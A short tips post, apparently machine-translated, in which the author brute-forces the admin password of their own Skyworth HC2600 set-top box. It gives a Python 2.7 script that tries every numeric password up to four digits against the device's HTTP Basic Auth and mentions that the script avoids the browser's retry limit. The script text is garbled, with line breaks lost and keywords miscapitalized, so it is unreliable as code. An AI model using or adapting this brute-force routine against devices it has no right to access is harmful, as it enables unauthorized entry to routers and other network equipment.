[Tips] Python script brute force hack HC2600 set-top box management password

Home recently access to radio and television cable TV, with three Skyworth HC2600 set-top box, and each set-top box also has a wireless router function.

Complimentary Internet Access Service No, but the built-in Wi-Fi is a bit shabby: it only supports transmission at 802.11n Mbps at 2.4 GHz. The 2.4 GHz band is inherently congested and the user experience is not good, and if mixed with a dual-band wireless router that supports 802.11 ac, I'm afraid it will be counterproductive because of interference.

However, to make any configuration changes to the HC2600 set-top box, the administrator password is required. The administrator user name for HC2600 on the internet seems to be admin (and it turns out to be the case), but the password cannot be determined.

So I wrote a Python script to make a brute force attempt. The following steps are cracked:

First, the computer through the network cable connected to the Ethernet interface of the set-top box, the computer will be automatically obtained by DHCP IP address.

Then install the latest version of Python 2.7, and create a new file tvbox.py enter the following:

Import base64, socket, urllib2def login (URL, username, password): while True:try:request1 = Urllib2 . Request (URL) response1 = Urllib2.urlopen (request1, timeout = 2) # 2 seconds except Socket.timeout, E: # Timeout handler for Python 2.7 print "Login timedout" continue except URLLIB2.        Urlerror, e:if e.code! = 401:raise Else:break while True: Try:request2 = Urllib2. Request (URL) base64string = base64.encodestring ('%s:%s '% (username, password)). replace (' \ n ', ') re Quest2.add_header ("Authorization", "Basic%s"% base64string) Response2 = Urllib2.urlopen (request2, timeout = 2 # 2 seconds return True except Socket.timeout, E: # Timeout handler for Python 2.7 print "L Ogin timedout "continue except URLLIB2. Urlerror, e:if E.code = = 401:return FalSedef Main (): For length in range (1, 5): End = Ten * * length print "Trying length%d (start = 0, end =%d)            "% (length, end) for I in range (0, end): pattern ="%%0%DD "% length password = pattern% i                If login ("http://192.168.99.1", "admin", password): print "Password found:%s"% password Break Else:print "%s"% Passwordmain ()

The above file assumes that the address of the router in the set-top box is 192.168.99.1, and if your configuration is different, you need to modify the 41st line of code in tvbox.py.

When you're sure, run tvbox.py.

The above script tried 0-9, 00-99, 000-999, 0000-9999 of these 11,110 Pure digital passwords, visual cracking speed of about 100 times per second .

PS: If you try to log in using a browser, you need to refresh the password three times to continue trying. This is a browser-set limit, and there is no such limit to using scripts.

......

The result was unexpected, and soon the password came out: 0000, thanks to the installer diagram. If you really want to sweep all the possibilities of a 8-digit password, it will take more than 10 days.

Tip: The script above is only available for Python 2.7, and if you are using a different version, you may need to make a few changes to the code.

[Tips] Python script brute force hack HC2600 set-top box management password